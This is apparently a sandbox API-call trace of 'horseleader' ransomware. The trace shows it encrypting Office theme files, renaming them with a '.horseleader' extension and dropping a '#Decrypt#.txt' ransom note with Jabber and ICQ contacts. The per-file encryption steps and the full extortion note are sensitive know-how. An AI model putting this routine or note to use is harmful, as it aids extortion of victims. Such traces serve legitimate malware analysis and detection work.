returned 11 [0246.553] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF", lpSrch=".testttjffg") returned 0x0 [0246.554] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.554] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.554] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.554] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF") returned 80 [0246.554] StrStrW (lpFirst="PREVIEW.GIF", lpSrch=".txt") returned 0x0 [0246.555] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=1287) returned 1 [0246.555] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x507, lpOverlapped=0x0) returned 1 [0246.605] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffffaf9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.605] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x507, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x507, lpOverlapped=0x0) returned 1 [0246.605] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.605] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.605] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.606] CloseHandle (hObject=0x1a4) returned 1 [0246.606] GetProcessHeap () returned 0x780000 [0246.606] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.606] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.horseleader") returned 92 [0246.606] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\PREVIEW.GIF.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\preview.gif.horseleader")) returned 1 [0246.607] GetProcessHeap () returned 0x780000 [0246.607] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.607] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6fb3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 1 [0246.607] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0246.607] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 81 [0246.607] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".horseleader") returned 0x0 [0246.607] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="#Decrypt#.txt") returned 1 [0246.607] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0246.607] lstrlenW (lpString=".testttjffg") returned 11 [0246.607] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG", lpSrch=".testttjffg") returned 0x0 [0246.607] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.607] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.607] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.608] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG") returned 81 [0246.608] StrStrW (lpFirst="THMBNAIL.PNG", lpSrch=".txt") returned 0x0 [0246.608] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=28595) returned 1 [0246.608] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.612] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.612] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x1fb3, lpOverlapped=0x0) returned 1 [0246.612] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffe04d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.612] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x1fb3, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x1fb3, lpOverlapped=0x0) returned 1 [0246.612] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.613] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.613] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.613] CloseHandle (hObject=0x1a4) returned 1 [0246.613] GetProcessHeap () returned 0x780000 [0246.613] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.613] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.horseleader") returned 93 [0246.613] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\THMBNAIL.PNG.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\thmbnail.png.horseleader")) returned 1 [0246.614] GetProcessHeap () returned 0x780000 [0246.614] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.614] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x5ad12690, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x6fb3, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="THMBNAIL.PNG", cAlternateFileName="")) returned 0 [0246.614] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0246.614] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\#Decrypt#.txt") returned 82 [0246.614] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CONCRETE\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\concrete\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0246.615] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0246.615] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0246.616] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0246.616] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0246.617] CloseHandle (hObject=0x158) returned 1 [0246.617] GetProcessHeap () returned 0x780000 [0246.617] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e2960 | out: hHeap=0x780000) returned 1 [0246.617] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="DEEPBLUE", cAlternateFileName="")) returned 1 [0246.617] lstrcmpiW (lpString1="DEEPBLUE", lpString2="Windows") returned -1 [0246.617] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE") returned 68 [0246.617] lstrcmpW (lpString1="DEEPBLUE", lpString2=".") returned 1 [0246.617] lstrcmpW (lpString1="DEEPBLUE", lpString2="..") returned 1 [0246.617] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0246.617] GetProcessHeap () returned 0x780000 [0246.617] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e2960 [0246.617] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*") returned 70 [0246.617] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0246.618] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0246.618] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\.") returned 70 [0246.618] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0246.618] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a6f8e30, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6073a7d0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="..", cAlternateFileName="")) returned 1 [0246.618] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0246.618] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\..") returned 71 [0246.618] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0246.618] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0246.618] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf641f700, ftCreationTime.dwHighDateTime=0x1cab7f1, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf641f700, ftLastWriteTime.dwHighDateTime=0x1cab7f1, nFileSizeHigh=0x0, nFileSizeLow=0x116dc, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="DEEPBLUE.ELM", cAlternateFileName="")) returned 1 [0246.618] lstrcmpiW (lpString1="DEEPBLUE.ELM", lpString2="Windows") returned -1 [0246.618] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 81 [0246.618] StrStrIW (lpFirst="DEEPBLUE.ELM", lpSrch=".horseleader") returned 0x0 [0246.618] lstrcmpW (lpString1="DEEPBLUE.ELM", lpString2="#Decrypt#.txt") returned 1 [0246.618] lstrcmpW (lpString1="DEEPBLUE.ELM", lpString2="_uninstalling_.png") returned 1 [0246.618] lstrlenW (lpString=".testttjffg") returned 11 [0246.618] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM", lpSrch=".testttjffg") returned 0x0 [0246.618] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0246.618] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0246.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0246.623] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM") returned 81 [0246.623] StrStrW (lpFirst="DEEPBLUE.ELM", lpSrch=".txt") returned 0x0 [0246.623] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x32aeb58 | out: lpFileSize=0x32aeb58*=71388) returned 1 [0246.623] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.623] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.633] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.633] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.635] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x636e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.635] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.635] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.636] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.636] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xc6dc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.636] ReadFile (in: hFile=0x1a4, lpBuffer=0x32a9a98, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesRead=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.637] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0246.637] WriteFile (in: hFile=0x1a4, lpBuffer=0x32a9a98*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32a9a98*, lpNumberOfBytesWritten=0x32aeb7c*=0x5000, lpOverlapped=0x0) returned 1 [0246.637] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0246.637] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aeb50*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aeb50*, lpNumberOfBytesWritten=0x32aeb7c*=0x4, lpOverlapped=0x0) returned 1 [0246.638] WriteFile (in: hFile=0x1a4, lpBuffer=0x32aea98*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aeb7c, lpOverlapped=0x0 | out: lpBuffer=0x32aea98*, lpNumberOfBytesWritten=0x32aeb7c*=0x80, lpOverlapped=0x0) returned 1 [0246.638] CloseHandle (hObject=0x1a4) returned 1 [0246.638] GetProcessHeap () returned 0x780000 [0246.638] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e31a8 [0246.639] wnsprintfW (in: pszDest=0x7e31a8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM.horseleader") returned 93 [0246.639] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.ELM.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\deepblue\\deepblue.elm.horseleader")) returned 1 [0246.640] GetProcessHeap () returned 0x780000 [0246.640] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e31a8 | out: hHeap=0x780000) returned 1 [0246.640] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376bcd00, ftCreationTime.dwHighDateTime=0x1c3ee72, ftLastAccessTime.dwLowDateTime=0x6073a7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x376bcd00, ftLastWriteTime.dwHighDateTime=0x1c3ee72, nFileSizeHigh=0x0, nFileSizeLow=0x239, dwReserved0=0x96d8c05d, dwReserved1=0xeae5f6ce, cFileName="DEEPBLUE.INF", cAlternateFileName="")) returned 1 [0246.640] lstrcmpiW (lpString1="DEEPBLUE.INF", lpString2="Windows") returned -1 [0246.640] wnsprintfW (in: pszDest=0x7e2960, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\DEEPBLUE\\DEEPBLUE.INF") returned 81 [0246.640] StrStrIW (lpFirst="DEEPBLUE.INF", lpSrch=".horseleader") returned 0x0 [0246.640] lstrcmpW (lpString1="DEEPBLUE.INF", lpString2="#Decrypt#.txt") returned 1 [0246.640] lstrcmpW (lpString1="DEEPBLUE.INF", lpString2="_uninstalling_.png") returned 1 [0246.640] lstrlenW (lpString=".testttjffg") returned 11 [0246.641] StrStrW 